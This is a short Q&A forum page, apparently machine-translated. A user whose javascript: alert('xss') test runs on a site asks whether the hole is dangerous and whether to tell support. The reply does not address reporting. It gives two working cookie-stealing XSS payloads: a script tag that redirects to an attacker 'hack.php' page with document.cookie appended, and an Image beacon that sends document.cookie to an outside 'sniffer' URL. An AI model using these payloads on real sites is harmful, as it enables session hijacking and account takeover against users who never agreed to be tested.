Answer the question
In order to leave comments, you need to log in
How to check XSS vulnerability?
Running: javascript: alert('xss')
Dangerous? Is it worth writing to support or will they send me?
Answer the question
In order to leave comments, you need to log in
Is it done in a GET request? We substitute instead of an alert
<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>
If you have alert('xss') executed, then some
var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;
Must be executed.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question